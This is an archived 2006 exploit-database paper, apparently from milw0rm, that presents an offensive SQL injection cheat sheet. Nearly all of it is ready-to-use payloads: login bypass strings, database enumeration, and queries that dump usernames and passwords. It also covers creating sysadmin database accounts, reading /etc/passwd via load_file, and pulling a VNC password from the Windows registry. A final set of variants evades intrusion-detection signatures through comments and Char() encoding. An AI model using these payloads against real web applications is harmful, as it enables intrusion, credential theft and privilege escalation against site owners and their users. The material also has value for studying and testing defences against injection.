SQL Injection Paper [BlackSecurity.org]

EDB-ID:

13227

CVE:

N/A

Author:

zeroday

Type:

papers

Platform:

Multiple

Published:

2006-03-28

    Sql Injection Paper                       
			         
     By zeroday.		         
        zeroday [ at ] blacksecurity.org  

	1.Introduction.
	2.Testing for vulnerabilities.
	3.Gathering Information.
	4.Data types.
	5.Grabbing Passwords.
	6.Create DB accounts.
	7.MySQL OS Interaction.
	8.Server name and config.
	9.Retrieving VNC password from registry.
	10.IDS Signature Evasion.
	11.mySQL Input Validation Circumvention using Char().
	12.IDS Signature Evasion using comments.
	13.Strings without quotes.

1. When a box only has port 80 open, it's almost certain the admin will patch his server,
The best thing to turn to is web attacks. Sql Injection is one of the most common web attacks.
You attack the web application, ( ASP, JSP, PHP, CGI..etc) rather than the webserver
or the services running on the OS.
Sql injection is a way to trick using a qurey or command as a input via webpages, 
most websites take parameters from the user like username and passwrod or even their emails.
They all use Sql querys.

2. First of you should start with something simple.
- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1-- 
These are simple ways to try another ones are:
- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
- ' union select sum(columnname) from tablename--

3.Gathering Infomation.
- ' or 1 in (select @@version)--
- ' union all select @@version--
Those will Find the actual Version of the computer, OS/service pack.

4.Data types.

Oracle
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB

MySQL
-->mysql.user
-->mysql.host
-->mysql.db

MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships

MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases

5.Grabbing passwords

'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --

' and 1 in (select var from temp)--

' ; drop table temp --

6.Create DB accounts.

MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'

MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))

Access
CRATE USER name IDENTIFIED BY 'pass123'

Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'

Oracle
CRATE USER name IDENTIFIED BY pass123
        TEMPORARY TABLESPACE temp
         DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;

7.MySQL OS Interaction

- ' union select 1,load_file('/etc/passwd'),1,1,1;

8.Server name and config.

- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--

9.Retrieving VNC password from registry.

- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--

10.IDS Signature Evasion.
Evading ' OR 1=1 Signature

- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR 'text' = N'text'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR 'text' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3

11.mySQL Input Validation Circumvention using Char().

Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
load files in unions (string = "/etc/passwd"):
-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

12.IDS Signature Evasion using comments.

-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle)     '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL)    '; EXEC ('SEL' + 'ECT US' + 'ER')

13.Strings without quotes.
--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)

Greets: kaneda, modem, wildcard, #black and pulltheplug.

# milw0rm.com [2006-03-28]